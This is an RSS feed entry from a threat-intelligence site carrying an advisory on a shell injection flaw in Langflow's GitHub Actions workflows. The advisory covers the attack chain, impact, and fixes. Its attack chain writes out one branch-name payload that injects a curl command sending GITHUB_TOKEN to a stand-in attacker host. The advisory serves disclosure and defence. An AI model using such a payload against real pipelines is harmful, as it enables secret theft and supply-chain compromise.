<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Shell-Injection — CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/shell-injection/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata — refreshed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Wed, 25 Mar 2026 12:00:00 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/shell-injection/feed.xml" rel="self" type="application/rss+xml"/><item><title>Langflow GitHub Actions Shell Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-03-langflow-shell-injection/</link><pubDate>Wed, 25 Mar 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-langflow-shell-injection/</guid><description>Unauthenticated remote shell injection vulnerability exists in Langflow GitHub Actions workflows prior to version 1.9.0, enabling attackers to execute arbitrary shell commands via malicious branch names or pull request titles due to unsanitized GitHub context variable interpolation, leading to potential secret exfiltration and supply chain compromise.</description><content:encoded><![CDATA[<p>Langflow, a tool for building and deploying AI-powered agents and workflows, is vulnerable to a critical shell injection flaw in its GitHub Actions workflows. Discovered in versions prior to 1.9.0 and assigned CVE-2026-33475, the vulnerability stems from unsanitized interpolation of GitHub context variables (e.g., <code>${{ github.head_ref }}</code>) within the <code>run:</code> steps of various workflow files. By crafting malicious branch names or pull request titles, attackers can inject and execute arbitrary shell commands during CI/CD pipeline execution. Successful exploitation allows for the exfiltration of sensitive CI/CD secrets like <code>GITHUB_TOKEN</code>, manipulation of infrastructure, and potential compromise of the software supply chain. The vulnerability was patched in version 1.9.0. This poses a significant risk to any public Langflow fork with GitHub Actions enabled.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker forks the Langflow repository on GitHub.</li>
<li>The attacker creates a new branch with a specially crafted name containing a shell injection payload, such as <code>injection-test &amp;&amp; curl https://attacker.site/exfil?token=$GITHUB_TOKEN</code>.</li>
<li>The attacker submits a pull request from the malicious branch to the main branch of the forked repository.</li>
<li>GitHub Actions is triggered to run the affected workflow (e.g., <code>deploy-docs-draft.yml</code>).</li>
<li>Within the workflow, the <code>run:</code> step attempts to use the unsanitized branch name via <code>${{ github.head_ref }}</code>.</li>
<li>The injected shell command executes, sending the <code>GITHUB_TOKEN</code> to an attacker-controlled server.</li>
<li>The attacker receives the <code>GITHUB_TOKEN</code> and can now authenticate to the GitHub API with the privileges of the affected workflow.</li>
<li>The attacker leverages the compromised <code>GITHUB_TOKEN</code> to push malicious code, create new releases, or tamper with other aspects of the software supply chain.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This vulnerability allows for arbitrary code execution within the GitHub Actions CI/CD environment. A successful attack grants full access to CI secrets, potentially leading to the exfiltration of the <code>GITHUB_TOKEN</code>. The attacker can then push malicious tags or container images, tamper with releases, or leak sensitive infrastructure data.  Given the nature of CI/CD pipelines, a compromise could have far-reaching effects on any project that depends on the affected Langflow repository or its forks. The number of potential victims is directly proportional to the number of Langflow forks with enabled GitHub Actions.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade to Langflow version 1.9.0 or later to patch CVE-2026-33475.</li>
<li>Examine GitHub Actions workflows for direct interpolation of GitHub context variables in <code>run:</code> steps, particularly those involving user-controlled values like branch names and pull request titles (e.g., in <code>.github/workflows/deploy-docs-draft.yml</code>).</li>
<li>Implement proper sanitization or quoting of untrusted inputs before using them in shell commands within GitHub Actions workflows.</li>
<li>Adopt the suggested fix of using environment variables and wrapping them in double quotes when referencing GitHub context variables within <code>run:</code> steps (as described in the overview).</li>
<li>Deploy the Sigma rule <code>Detect Github Actions Shell Injection via Branch Name</code> to identify potentially malicious branch names used in pull requests.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>shell-injection</category><category>github-actions</category><category>supply-chain</category></item></channel></rss>